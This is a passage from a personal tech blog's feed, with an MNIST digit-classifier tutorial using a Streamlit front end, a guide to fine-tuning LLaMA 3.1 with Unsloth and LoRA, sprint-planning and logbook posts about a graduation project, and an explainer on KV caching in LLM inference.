overfitting.</li><li>Tracks accuracy and learning history.</li></ul><h4 id="summarizediagnostics"><code>summarize_diagnostics(histories)</code></h4><ul><li>Plots the training (blue) and validation (orange) loss and accuracy curves for each fold.</li></ul><h4 id="summarizeperformancescores"><code>summarize_performance(scores)</code></h4><ul><li>Displays average model accuracy and variation.</li><li>Plots a boxplot of performance across folds.</li></ul><h3 id="3model-training-and-saving">3- Model Training and Saving</h3><h4 id="runtestharness"><code>run_test_harness()</code></h4><ul><li>Manages the full training and evaluation 
flow.</li><li>Calls:<ul><li><code>load_dataset()</code></li><li><code>prep_pixels()</code></li><li><code>evaluate_model()</code></li><li><code>summarize_diagnostics()</code></li><li><code>summarize_performance()</code></li></ul></li></ul><h4 id="savemodel"><code>save_model()</code></h4><ul><li>Trains the model once on all training data (outside cross-validation).</li><li>Saves the trained model as <code>final_model.h5</code>.</li></ul><h3 id="4making-predictions">4- Making Predictions</h3><p></p><pre><code class="language-Python">import numpy as np
from tensorflow.keras.models import load_model
from tensorflow.keras.datasets import mnist

def classify_digit(image):
    model = load_model(&apos;final_model.h5&apos;)
    image = image.reshape(1, 28, 28, 1)
    image = image.astype(&apos;float32&apos;) / 255.0
    prediction = model.predict(image)
    return np.argmax(prediction, axis=1)[0]

(trainX, trainY), (testX, testY) = mnist.load_data()
sample_image = testX[0]
digit_class = classify_digit(sample_image)
print(&quot;Predicted class:&quot;, digit_class)</code></pre><h4 id="classifydigitimage"><code>classify_digit(image)</code></h4><ul><li>Loads the saved model.</li><li>Accepts a <code>28x28</code> grayscale image.</li><li>Normalizes and reshapes it.</li><li>Predicts the digit using <code>argmax</code> of softmax probabilities.</li></ul><h3 id="4build-the-front-end">5- Build the Front-End</h3><pre><code class="language-Python">import streamlit as st
from streamlit_drawable_canvas import st_canvas
from tensorflow.keras.models import load_model
import numpy as np
from PIL import Image
import pandas as pd

@st.cache_resource
def load_mnist_model():
    try:
        return load_model(&apos;final_model.h5&apos;)
    except Exception as e:
        st.error(f&quot;Error loading model: {e}&quot;)
        return None

model = load_mnist_model()

st.title(&quot;MNIST Digit Classifier&quot;)
st.markdown(&quot;Draw a digit on the canvas below and see the model predict the digit!&quot;)

st.sidebar.header(&quot;Configuration&quot;)
b_color = st.sidebar.color_picker(&quot;Brush color&quot;, &quot;#000000&quot;)
bg_color = st.sidebar.color_picker(&quot;Background color&quot;, &quot;#FFFFFF&quot;)
drawing_mode = st.sidebar.checkbox(&quot;Drawing mode?&quot;, True)

canvas_result = st_canvas(
    stroke_width=20,
    stroke_color=b_color,
    background_color=bg_color,
    height=280,
    width=280,
    drawing_mode=&apos;freedraw&apos; if drawing_mode else &apos;transform&apos;,
    key=&quot;canvas&quot;
)

def preprocess_image(image_data):
    img = Image.fromarray(image_data.astype(&apos;uint8&apos;), &apos;RGBA&apos;).convert(&apos;L&apos;)
    img = img.resize((28, 28))
    img = Image.eval(img, lambda x: 255 - x)  # invert so digits are white on black, matching MNIST
    img = np.array(img).astype(&apos;float32&apos;) / 255.0
    img = img.reshape(1, 28, 28, 1)
    return img

if model is not None and canvas_result.image_data is not None:
    img = preprocess_image(canvas_result.image_data)
    prediction = model.predict(img)
    pred_digit = np.argmax(prediction)
    probabilities = prediction[0]
    st.write(f&quot;Predicted digit: **{pred_digit}**&quot;)
    prob_df = pd.DataFrame(probabilities, index=range(10), columns=[&quot;Probability&quot;])
    st.bar_chart(prob_df)
else:
    st.write(&quot;Please draw a digit on the canvas.&quot;)</code></pre><h4 id="stcacheresource-loadmnistmodel"><code>@st.cache_resource</code> + <code>load_mnist_model()</code></h4><ul><li>Loads the trained model once using caching for performance.</li></ul><h4 id="stcanvas"><code>st_canvas</code></h4><ul><li>Canvas where the user can draw a digit.</li></ul><h4 id="preprocessimageimagedata"><code>preprocess_image(image_data)</code></h4><ul><li>Converts canvas image to grayscale.</li><li>Resizes to 28x28.</li><li>Inverts pixel colors (white-on-black &#x2192; black-on-white).</li><li>Normalizes and reshapes to CNN input format.</li></ul><h4 id="live-prediction-and-visualization">Live Prediction and Visualization</h4><ul><li>Once the user draws:<ul><li>The image is processed and passed to the model.</li><li>Prediction is shown alongside a bar chart of probabilities (using <code>st.bar_chart()</code>).</li></ul></li></ul><p></p><h2 id="run-the-app">Run the App</h2><pre><code class="language-Bash">streamlit run app.py</code></pre>]]></content:encoded></item><item><title><![CDATA[Fine-Tuning LLaMA 3.1 with Unsloth]]></title><description><![CDATA[<h3 id="introduction-to-llm-inference">Introduction to LLM Inference</h3><p>In this post, I will walk through how to fine-tune Meta&apos;s LLaMA 3.1 8B model using <a href="https://github.com/unslothai/unsloth?ref=blog.mohammedx.tech">Unsloth</a>, a library optimized for efficient LLM training. I will cover everything from installing dependencies to training and saving the fine-tuned model.</p><h2 id="1-setting-up-the-environment">1. 
Setting Up the Environment</h2>]]></description><link>https://blog.mohammedx.tech/fine-tuning-llama-3-1-with-unsloth/</link><guid isPermaLink="false">679ca1172074360001f33ed0</guid><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Fri, 31 Jan 2025 10:20:10 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2025/08/unsloth2.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction-to-llm-inference">Introduction to LLM Inference</h3><img src="https://blog.mohammedx.tech/content/images/2025/08/unsloth2.png" alt="Fine-Tuning LLaMA 3.1 with Unsloth"><p>In this post, I will walk through how to fine-tune Meta&apos;s LLaMA 3.1 8B model using <a href="https://github.com/unslothai/unsloth?ref=blog.mohammedx.tech">Unsloth</a>, a library optimized for efficient LLM training. I will cover everything from installing dependencies to training and saving the fine-tuned model.</p><h2 id="1-setting-up-the-environment">1. Setting Up the Environment</h2><p>Before we begin fine-tuning, we need to install the required packages:</p><pre><code class="language-python">%%capture
!pip install unsloth
!pip install datasets
!pip uninstall unsloth -y &amp;&amp; pip install --upgrade --no-cache-dir --no-deps git+https://github.com/unslothai/unsloth.git</code></pre><ul><li><code>unsloth</code> is the primary library used for loading and fine-tuning the LLaMA model efficiently.</li><li><code>datasets</code> helps us handle and preprocess text datasets.</li><li>We uninstall and reinstall <code>unsloth</code> from its latest GitHub version to ensure we have the newest features and bug fixes.</li></ul><h2 id="2-model-configuration-and-loading"><strong>2. Model Configuration and Loading</strong></h2><pre><code class="language-python">from unsloth import FastLanguageModel
import torch

# Configuration
max_seq_length = 8192  # Setting the context length to 8192
dtype = torch.bfloat16  # bfloat16 precision to reduce memory usage
load_in_4bit = False  # set True to load a 4-bit quantized model and save VRAM

model_name = &quot;unsloth/Meta-Llama-3.1-8B&quot;

# Load the model and tokenizer
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name=model_name,
    max_seq_length=max_seq_length,
    dtype=dtype,
    load_in_4bit=load_in_4bit,
)</code></pre><ul><li>We define a <strong>sequence length</strong> of <strong>8192</strong>, which means the model can process long-context data.</li><li><code>dtype = torch.bfloat16</code> sets <strong>bfloat16</strong> as the precision type, reducing memory usage.</li><li>The model is loaded using <code>FastLanguageModel.from_pretrained()</code>, which fetches <strong>Meta LLaMA 3.1 8B</strong>.</li></ul><h2 id="3-applying-lora-for-efficient-fine-tuning"><strong>3. Applying LoRA for Efficient Fine-Tuning</strong></h2><pre><code class="language-python">model = FastLanguageModel.get_peft_model(
    model,
    r = 16, 
    target_modules = [&quot;q_proj&quot;, &quot;k_proj&quot;, &quot;v_proj&quot;, &quot;o_proj&quot;,
                      &quot;gate_proj&quot;, &quot;up_proj&quot;, &quot;down_proj&quot;],
    lora_alpha = 16,
    lora_dropout = 0, 
    bias = &quot;none&quot;,    
    use_gradient_checkpointing = &quot;unsloth&quot;, 
    random_state = 3407,
    use_rslora = False,  
    loftq_config = None, 
)</code></pre><p>We apply <strong>LoRA (Low-Rank Adaptation)</strong> to reduce the number of trainable parameters:</p><ul><li><code>r = 16</code>: The rank of LoRA updates (trade-off between memory and adaptability).</li><li><code>lora_alpha = 16</code>: A scaling factor for LoRA layers.</li><li><code>use_gradient_checkpointing = &quot;unsloth&quot;</code>: Reduces memory usage during training.</li><li>This allows efficient fine-tuning without modifying the entire model.</li></ul><h2 id="4-loading-and-preprocessing-the-dataset"><strong>4. Loading and Preprocessing the Dataset</strong></h2><pre><code class="language-python">from datasets import Dataset

# Load dataset from JSON file
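# dataset.json is assumed (inferred from the formatting step in the next
# section) to be a list of records with "prompt" and "response" keys, e.g.:
# [{"prompt": "What is LoRA?", "response": "A low-rank adaptation method."}]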
dataset = Dataset.from_json(&quot;dataset.json&quot;)</code></pre><h2 id="5-formatting-the-dataset"><strong>5. Formatting the Dataset</strong></h2><pre><code class="language-python">custom_prompt = &quot;&quot;&quot;Below is a prompt and its corresponding response. Write a completion that adheres to the response.

### Prompt:
{}

### Response:
{}&quot;&quot;&quot;

EOS_TOKEN = tokenizer.eos_token  

def formatting_prompts_func(examples):
    prompts = examples[&quot;prompt&quot;]
    responses = examples[&quot;response&quot;]
    texts = []
    for prompt, response in zip(prompts, responses):
        text = custom_prompt.format(prompt, response) + EOS_TOKEN
        texts.append(text)
    return {&quot;text&quot;: texts}

dataset = dataset.map(formatting_prompts_func, batched=True)</code></pre><ul><li>We format the dataset into a <strong>prompt-response</strong> structure, adding an <strong>EOS_TOKEN</strong> at the end to indicate completion.</li><li>This function ensures that our training data follows a structured format for proper fine-tuning.</li></ul><h2 id="6-tokenizing-the-dataset"><strong>6. Tokenizing the Dataset</strong></h2><pre><code class="language-python">def tokenize_function(examples):
    return tokenizer(examples[&quot;text&quot;], truncation=True, padding=&quot;max_length&quot;, max_length=8192)

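# Note: padding every sample to max_length=8192 keeps tensor shapes uniform
# but is memory-hungry when most samples are short; dynamic padding with a
# data collator (or sequence packing) is a common alternative.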
tokenized_dataset = dataset.map(tokenize_function, batched=True)

# Save tokenized dataset for fine-tuning
tokenized_dataset.save_to_disk(&quot;tokenized_dataset&quot;)

print(&quot;Dataset preprocessing complete. Ready for fine-tuning!&quot;)</code></pre><ul><li>The function tokenizes our formatted dataset, ensuring each sample fits within the <strong>8192-token limit</strong>.</li><li>We <strong>truncate</strong> longer inputs and <strong>pad</strong> shorter ones to maintain uniformity.</li><li>The dataset is then saved for training</li></ul><h2 id="7-fine-tuning-the-model"><strong>7. Fine-Tuning the Model</strong></h2><pre><code class="language-python">from trl import SFTTrainer
from transformers import TrainingArguments
from unsloth import is_bfloat16_supported

trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=tokenized_dataset,
    dataset_text_field=&quot;text&quot;,
    max_seq_length=max_seq_length,
    dataset_num_proc=2,
    packing=False,  
    args=TrainingArguments(
        per_device_train_batch_size=2,
        gradient_accumulation_steps=4,  # effective batch size = 2 x 4 = 8 per device
        warmup_steps=5,
        num_train_epochs=2,  
        learning_rate=2e-4,
        fp16=not is_bfloat16_supported(),
        bf16=is_bfloat16_supported(),
        logging_steps=1,
        optim=&quot;adamw_8bit&quot;,
        weight_decay=0.01,
        lr_scheduler_type=&quot;linear&quot;,
        seed=3407,
        output_dir=&quot;outputs&quot;,
        report_to=&quot;none&quot;,  
    ),
)
trainer_stats = trainer.train()</code></pre><ul><li>We use <strong>SFTTrainer</strong> (Supervised Fine-Tuning) from <code>trl</code> to manage training.</li><li><code>gradient_accumulation_steps=4</code> helps optimize memory usage.</li><li><code>learning_rate=2e-4</code> sets the learning rate for gradual updates.</li><li>The optimizer <strong>adamw_8bit</strong> is used for efficiency.</li><li>The model is trained for <strong>2 epochs</strong> with a <strong>batch size of 2</strong> per GPU.</li></ul><h2 id="8-saving-the-fine-tuned-model"><strong>8. Saving the Fine-Tuned Model</strong></h2><pre><code class="language-python">model.save_pretrained_merged(&quot;model&quot;, tokenizer, save_method=&quot;merged_16bit&quot;)</code></pre><ul><li>Saves the fine-tuned model in a <strong>16-bit format</strong> to optimize storage.</li><li>The model is now ready for inference and further deployment.</li></ul><h2 id="conclusion"><strong>Conclusion</strong></h2><p>Fine-tuning LLaMA 3.1 with <strong>Unsloth</strong> offers a powerful and memory-efficient way to adapt LLMs for custom use cases. 
By using <strong>LoRA</strong>, structured dataset preparation, and an optimized training approach, we can achieve high-quality results with limited resources.</p>]]></content:encoded></item><item><title><![CDATA[Graduation Planning]]></title><description><![CDATA[<p>This blog will highlight my planning process for the graduation semester using Trello.</p><h3 id="sprint-1">Sprint 1</h3><p><strong>Highlights: </strong></p><ul><li>Project Plan</li><li>Start on the research</li><li>Discuss MoSCoW with stakeholders</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image.png" class="kg-image" alt loading="lazy" width="1153" height="496" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image.png 1153w" sizes="(min-width: 720px) 720px"></figure><h3 id="sprint-2">Sprint 2</h3><p><strong>Highlights: </strong></p><ul><li>Design Document</li><li>EU AI Act Document</li><li>Get Project Plan Approval</li><li>Functional Design Document</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image-2.png" class="kg-image" alt loading="lazy" width="1150" height="505" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-2.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-2.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image-2.png 1150w" sizes="(min-width: 720px) 720px"></figure><p></p><h3 id="sprint-3">Sprint 3</h3><p><strong>Highlights: </strong></p><ul><li>Answer Research Question 4</li><li>Finish</li></ul>]]></description><link>https://blog.mohammedx.tech/graduation-planning/</link><guid isPermaLink="false">677346592074360001f33e97</guid><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Tue, 31 Dec 2024 02:11:42 
GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/12/strategic-planning2-1210x423.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/12/strategic-planning2-1210x423.jpg" alt="Graduation Planning"><p>This blog will highlight my planning process for the graduation semester using Trello.</p><h3 id="sprint-1">Sprint 1</h3><p><strong>Highlights: </strong></p><ul><li>Project Plan</li><li>Start on the research</li><li>Discuss MoSCoW with stakeholders</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1153" height="496" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image.png 1153w" sizes="(min-width: 720px) 720px"></figure><h3 id="sprint-2">Sprint 2</h3><p><strong>Highlights: </strong></p><ul><li>Design Document</li><li>EU AI Act Document</li><li>Get Project Plan Approval</li><li>Functional Design Document</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image-2.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1150" height="505" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-2.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-2.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image-2.png 1150w" sizes="(min-width: 720px) 720px"></figure><p></p><h3 id="sprint-3">Sprint 3</h3><p><strong>Highlights: </strong></p><ul><li>Answer Research Question 4</li><li>Finish First Version of Portfolio</li><li>Research Prices of Cloud GPUs as Temporary Solution</li></ul><figure class="kg-card kg-image-card"><img 
src="https://blog.mohammedx.tech/content/images/2024/12/image-3.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1154" height="770" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-3.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-3.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image-3.png 1154w" sizes="(min-width: 720px) 720px"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image-4.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1147" height="882" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-4.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-4.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image-4.png 1147w" sizes="(min-width: 720px) 720px"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image-5.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1145" height="1024" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-5.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-5.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image-5.png 1145w" sizes="(min-width: 720px) 720px"></figure><h3 id="sprint-4">Sprint 4</h3><p><strong>Highlights: </strong></p><ul><li><strong>LLM Design Plan</strong></li><li><strong>Technical Implementation Guide Document</strong></li><li><strong>Secura Christmas Party</strong></li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image-6.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1157" height="1031" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-6.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-6.png 1000w, 
https://blog.mohammedx.tech/content/images/2024/12/image-6.png 1157w" sizes="(min-width: 720px) 720px"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2024/12/image-7.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1154" height="1029" srcset="https://blog.mohammedx.tech/content/images/size/w600/2024/12/image-7.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2024/12/image-7.png 1000w, https://blog.mohammedx.tech/content/images/2024/12/image-7.png 1154w" sizes="(min-width: 720px) 720px"></figure><h3 id="sprint-5">Sprint 5</h3><p><strong>Highlights: </strong></p><ul><li>Finished the LLM Design Plan Document.</li><li>Finished the Technical Implementation Guide Document.</li><li>Build the application on the LLM machine.</li><li>Start finding ways to improve the accuracy.</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/01/image-1.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1159" height="1034" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/01/image-1.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/01/image-1.png 1000w, https://blog.mohammedx.tech/content/images/2025/01/image-1.png 1159w" sizes="(min-width: 720px) 720px"></figure><h3 id="sprint-6">Sprint 6</h3><p><strong>Highlights: </strong></p><ul><li>Finalizing the project and the Portfolio. 
</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/01/image-2.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1155" height="1036" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/01/image-2.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/01/image-2.png 1000w, https://blog.mohammedx.tech/content/images/2025/01/image-2.png 1155w" sizes="(min-width: 720px) 720px"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/01/image-3.png" class="kg-image" alt="Graduation Planning" loading="lazy" width="1155" height="1036" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/01/image-3.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/01/image-3.png 1000w, https://blog.mohammedx.tech/content/images/2025/01/image-3.png 1155w" sizes="(min-width: 720px) 720px"></figure>]]></content:encoded></item><item><title><![CDATA[KV Cache in LLMs]]></title><description><![CDATA[<p>In this blog, I will explain what KV cache is and how it is used in LLM inference.</p><h3 id="introduction-to-llm-inference">Introduction to LLM Inference</h3><p>Large Language Model (LLM) inference is the process of generating outputs from pre-trained models. 
It involves running the model to complete tasks such as text generation, translation, or</p>]]></description><link>https://blog.mohammedx.tech/kv-cache/</link><guid isPermaLink="false">670e3a512074360001f33e54</guid><category><![CDATA[GenAI]]></category><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Tue, 15 Oct 2024 10:03:14 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/10/fine-tuning-large-language-models-a-complete-guide-to-building-an-llm-img-6-1921x1184x343x0x1578x1184x1702999185.webp" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/10/fine-tuning-large-language-models-a-complete-guide-to-building-an-llm-img-6-1921x1184x343x0x1578x1184x1702999185.webp" alt="KV Cache in LLMs"><p>In this blog, I will explain what KV cache is and how it is used in LLM inference.</p><h3 id="introduction-to-llm-inference">Introduction to LLM Inference</h3><p>Large Language Model (LLM) inference is the process of generating outputs from pre-trained models. It involves running the model to complete tasks such as text generation, translation, or answering questions. Efficient inference is important for reducing latency and resource usage, particularly for real-time applications like chatbots</p><h3 id="kv-key-value-cache">KV (Key-Value) cache</h3><p>KV (Key-Value) cache is a mechanism used in large language model (LLM) inference to store and reuse intermediate computations during text generation. In autoregressive models like GPT, each new token is generated based on previous tokens. Normally, the model reprocesses the entire input sequence for every token prediction, which can be computationally expensive and slow, especially for long sequences.</p><p>The KV cache optimizes this process by storing the key-value pairs generated from previous tokens. 
These pairs represent the attention mechanism&#x2019;s outputs that the model uses to focus on relevant parts of the input during inference. By caching these values, the model avoids recalculating them for each token, significantly speeding up the generation process and reducing memory consumption.</p><p>This caching mechanism is particularly beneficial for applications like real-time chatbots, where response times are important, and long context windows need to be processed efficiently. Without KV caching, the model would need to repeatedly process the entire sequence, leading to slower performance and higher computational costs.</p><h3 id="how-kv-cache-works-in-llms">How KV Cache Works in LLMs</h3><p>KV cache plays a critical role in optimizing the inference process of autoregressive large language models (LLMs) by reducing redundant computations. To understand how it works, let&#x2019;s break down its function step by step:</p><h4 id="31-storing-key-value-pairs">3.1 Storing Key-Value Pairs</h4><p>In a transformer-based LLM, each layer of the model computes attention weights based on &quot;queries&quot; (Q), &quot;keys&quot; (K), and &quot;values&quot; (V). These components are used to determine how much attention should be paid to each part of the input sequence when generating the next token. Normally, each new token generation requires recalculating attention over the entire sequence of input tokens, which increases the processing time as the sequence grows.</p><p>With KV caching, the model stores the key-value pairs generated during the initial pass through the sequence in memory. 
These stored pairs can then be reused for subsequent token generation without recalculating them, as they remain the same for the sequence&#x2019;s previous tokens.</p><h4 id="32-reusing-past-context">3.2 Reusing Past Context</h4><p>During inference, when generating the next token, the model uses the cached key-value pairs from previous tokens instead of recalculating the attention for those tokens. This allows the model to only focus on the newly generated token while leveraging the cached data for the rest of the sequence.</p><p>For example, when generating the 100th token in a sequence, the model doesn&apos;t need to reprocess the first 99 tokens. It reuses the cached K-V pairs and only processes the 100th token, reducing the overall computational load.</p><h4 id="33-benefits-of-kv-cache">3.3 Benefits of KV Cache</h4><ul><li><strong>Faster Inference</strong>: By eliminating the need to recompute attention scores for previous tokens, KV caching significantly speeds up the inference process, especially for longer sequences.</li><li><strong>Efficient Memory Usage</strong>: While caching requires memory to store the key-value pairs, it prevents the need to repeatedly process long input sequences, reducing memory and computational overhead.</li><li><strong>Scalability</strong>: KV caching allows LLMs to handle long context windows efficiently, making it ideal for tasks such as document summarization, chatbot conversations, or any application that requires continuous interaction with long sequences of text.</li></ul><p>By caching  attention results, KV cache enhances the model&apos;s ability to generate text more quickly and efficiently, particularly in tasks that demand quick responses and low latency.</p><h3 id="performance-impact-of-kv-caching">Performance Impact of KV Caching</h3><p>KV caching has a significant impact on the performance of large language models (LLMs) during inference, particularly in terms of speed, memory efficiency, and scalability. 
Here&#x2019;s how it affects performance:</p><h4 id="41-speed-improvements">4.1 Speed Improvements</h4><p>One of the primary benefits of KV caching is the substantial boost in inference speed. In models without KV caching, every token generation requires the model to reprocess the entire sequence of previous tokens, which becomes increasingly time-consuming as the sequence length grows.</p><p>By storing and reusing key-value pairs, the model avoids redundant computations for previously processed tokens. Each generation step then only computes attention for <strong>the newest token</strong> against the cached keys and values, instead of recomputing attention over the entire prefix. For long sequences, this can lead to an <strong>order of magnitude improvement in speed</strong>, particularly in real-time applications like chatbots or live translations, where fast response times are crucial.</p><h4 id="42-memory-efficiency">4.2 Memory Efficiency</h4><p>While KV caching does introduce a memory overhead due to the storage of key-value pairs, this trade-off is generally outweighed by the efficiency gains: the computation that would otherwise be spent recalculating attention over long sequences is saved.</p><p>The memory footprint is also predictable: the cache grows <strong>linearly</strong> with the sequence length, storing one key and one value vector per token for each attention layer. In practice, this linear memory cost is far cheaper than the repeated computation a non-caching approach incurs by reprocessing the entire sequence at every step.</p><h4 id="43-handling-long-sequences">4.3 Handling Long Sequences</h4><p>LLMs are known to struggle with handling long input sequences during inference, as the computational cost of processing every token grows significantly with sequence length. 
KV caching allows the model to efficiently handle these long sequences by only focusing on newly generated tokens while reusing cached data for previous tokens.</p><p>This makes KV caching ideal for applications requiring continuous interaction with long text streams, such as:</p><ul><li><strong>Conversations</strong>: In chatbots or virtual assistants, where previous conversation history needs to be referenced.</li><li><strong>Document Summarization</strong>: Handling long documents without being overwhelmed by the growing sequence length.</li><li><strong>Code Generation</strong>: Keeping track of long code contexts efficiently during token generation.</li></ul><h4 id="44-benchmarking-kv-caching-performance">4.4 Benchmarking KV Caching Performance</h4><p>Several benchmarks and tests across popular LLM architectures have demonstrated the benefits of KV caching. For example:</p><ul><li><strong>GPT-style models</strong> show up to a <strong>10x speed improvement</strong> when using KV caching for sequences longer than 500 tokens.</li><li><strong>Latency reduction</strong>: In real-time applications, latency drops significantly with caching, making it a critical component for low-latency environments.</li><li><strong>Resource conservation</strong>: KV caching reduces the strain on hardware, making models more cost-effective to run on GPUs, TPUs, or even CPUs in some cases.</li></ul><p>Overall, the performance impact of KV caching is profound, allowing LLMs to scale more effectively while reducing the computational cost and latency associated with long-sequence inference. This optimization is essential for deploying LLMs in real-world, latency-sensitive applications like virtual assistants, content generation tools, and large-scale NLP services.</p><h3 id="conclusion">Conclusion</h3><p>KV caching is an important optimization in large language model (LLM) inference, significantly enhancing speed, memory efficiency, and scalability. 
By storing and reusing key-value pairs, models can generate text faster and handle longer sequences with lower computational costs. This makes KV caching indispensable for real-time applications like chatbots, document summarization, and code generation, where low latency and efficient resource usage are critical.</p><h3 id="references">References</h3><ul><li>https://www.youtube.com/watch?v=eMlx5fFNoYc </li><li>https://www.youtube.com/watch?v=hMs8VNRy5Ys </li><li>https://medium.com/cj-express-tech-tildi/how-does-vllm-optimize-the-llm-serving-system-d3713009fb73 </li></ul>]]></content:encoded></item><item><title><![CDATA[Graduation Logbook]]></title><description><![CDATA[<p>This blog will showcase my progress and feedback from my mentor throughout my graduation semester at Secura.</p><p>The graduation semester spans 18 weeks, from September 2, 2024, to January 24, 2025.</p><h3 id="weeks-1-and-2-september-2-2024september-13-2024">Weeks 1 and 2 (September 2, 2024 - September 13, 2024)</h3><ul><li><strong>Project Planning:</strong> Created a comprehensive project plan in</li></ul>]]></description><link>https://blog.mohammedx.tech/graduation-logbook/</link><guid isPermaLink="false">66f6b1042074360001f33df4</guid><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Fri, 27 Sep 2024 13:54:51 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/09/Xnip2024-09-27_15-22-33.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/09/Xnip2024-09-27_15-22-33.jpg" alt="Graduation Logbook"><p>This blog will showcase my progress and feedback from my mentor throughout my graduation semester at Secura.</p><p>The graduation semester spans 18 weeks, from September 2, 2024, to January 24, 2025.</p><h3 id="weeks-1-and-2-september-2-2024september-13-2024">Weeks 1 and 2 (September 2, 2024 - September 13, 2024)</h3><ul><li><strong>Project Planning:</strong> Created a comprehensive project plan in line 
with the university&apos;s requirements.</li><li><strong>Functional Document:</strong> Began drafting a functional document aimed at explaining the project to non-technical stakeholders.</li><li><strong>University Supervisor Meeting:</strong> Held my first meeting with the university supervisor to discuss the project&apos;s direction and goals.</li><li><strong>LLM Fine-tuning:</strong> Started fine-tuning a local LLM model to handle LaTeX content translation.</li><li><strong>Interview: </strong>I interviewed my company mentor, asking him some questions regarding my project at Secura.</li><li><strong>Research: </strong>I finished the first two research questions. The first helped me choose an open-source LLM, Llama 3.1, for my project, and the second analyzed the hardware requirements for that model, concluding that dual RTX 4090 GPUs are needed.</li></ul><p>Feedback from Joel:</p><ul><li>The use cases and functional requirements are good, but there are some important sections missing.</li><li>The functional and technical design should explain the current setup and what it will look like when the project is finished.</li><li>Add a section called &quot;Justification of Choice for Research Environment.&quot; This should explain why you chose the operating system, focusing on things like how future-proof and user-friendly it is.</li><li>Include a section about hardware. Since this is the functional design, explain what hardware is needed and for what purpose, but there&#x2019;s no need to include technical details.</li><li>Add a section on security. 
This should cover things like who can access the system, the security policies in place, and how physical access is managed.</li><li>It would be helpful to use a MoSCoW chart to clearly define the project goals and priorities.</li></ul><p>Feedback from Gayatri:</p><ul><li>We discussed the overall project and its scope, and Gayatri emphasized the need to focus more on the infrastructure side rather than the software.</li><li>The initial draft of the project plan included 10 research questions, but Gayatri recommended reducing the number to a maximum of 5 to keep the project manageable.</li><li>Gayatri suggested shifting the project&apos;s focus more towards the infrastructure aspect, ensuring it aligns with the company&apos;s needs, and university requirements.</li></ul><h3 id="weeks-3-and-4-september-16-2024september-27-2024">Weeks 3 and 4 (September 16, 2024 - September 27, 2024)</h3><ul><li><strong>Project Plan &amp; Functional Design Updates:</strong> Added additional details to both the project plan and the functional design document.</li><li><strong>Backend Server Research:</strong> Conducted research on backend server options and concluded that it would be valuable to include in my in-depth research.</li><li><strong>MoSCoW Board Discussion:</strong> Had a meeting with Joel to discuss the MoSCoW board and 